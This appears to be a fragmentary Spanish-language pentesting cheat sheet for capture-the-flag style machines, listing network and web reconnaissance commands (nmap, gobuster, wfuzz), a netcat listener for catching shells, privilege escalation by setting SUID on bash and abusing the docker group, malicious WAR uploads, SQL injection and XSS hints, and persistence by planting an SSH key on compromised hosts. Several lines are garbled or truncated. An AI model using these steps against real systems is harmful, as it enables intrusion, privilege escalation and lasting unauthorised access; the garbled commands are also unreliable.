rockyoubas arpp -oVer si la maquina está activa
ping -c {ip}
Escanear ip en la red local
sudo arp-scan -I eth0 --localnet --ignoredups
Ver puertos abiertos
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn [Link] -oG allPorts
Ver la versión de los puertos y lanzar un conjunto de scripts básicos de
reconocimiento
nmap -sC -sV -p80 [Link] -oN targeted
nmap --script http-enum -p80 ip -oN webScan
Reconocimiento de la web general
whatweb [Link]
Arrastrar cookie de sesión en curl
Cuando está el smtp abierto asi se mandan correos
enter y punto y quit
python -m [Link] 80
en caso de hacer el reconocimiento habitual y no ver nada procederamos a enumerar los
posibles subdirectorios -xms y vhost
gobuster vhost -u [Link] -w /usr/share/seclists/Discovery/DNS/subdomain -t 20
gobuster vhost -u [Link] -w
/usr/share/seclists/Discovery/Web-Content/[Link] -t 20
gobuster dir -u [Link] -w
/usr/share/seclists/Discovery/Web-Content/[Link] -t 20 -x
php,html,txt,[Link],bak
nc -nlvp puerto
Abuso de grupo docker para escalar privilegios
ir al directorio bin y asignar privilegios a la bash
pkexec berdav
tree -fas para ver las rutas de una carpeta
--text
buscar forma recursiva y en case sensitive
inspeccionar certificados
uvicorn
fuzzing sin hilos para evitar cosas raras
wfuzz -c --hc=404 -w /usr/share/seclist/Discovery/Web-content/[Link]
[Link]
wfuzz -c - X POST -w
/usr/share/seclist/Discovery/Web-content/[Link]
[Link]
crear user peticion curl
curl -s -X POSRT http:// -d ‘{“email”:”prueba@[Link]”}’
tenemos acceso a docs
tomcat
probar la contraseña que aprece en el error 403
war malicioso
cuando sea una maquina windows
joomla
buscar contraseña o probar por contraseñas por defecto
se pueden subir archivos php
Werkzeug
En está maquina me ha descargado un [Link]
git log, buscamos el [Link] para ver como funciona la app como vemos que se
puede subir archivhpos sobre escribimos la app para obtener una ejecucion remota
de comandos
console
Buscar el LFI para ver el user que está usando la consola, lanzar script de hattricks
SecNotes/XSS Y SQL
Probar a enviar mensaje al admin
injecciones sql en el registro y xss tambien
Mentor
docs
snmp/
Transferencia de archivos rápida
Escalada de privilegios
Si hay algun fichero backup intentar signar una bash SUID chmod u+s /bin/bas
Persistencia en las maquinas pwneadas
ssh-keygen y enter
cat ~/.ssh/id_rsa.pub | tr -d ‘\n’ | xclip -sel clip
ahora esto lo metemos en la maquina pwneada como authorized_keys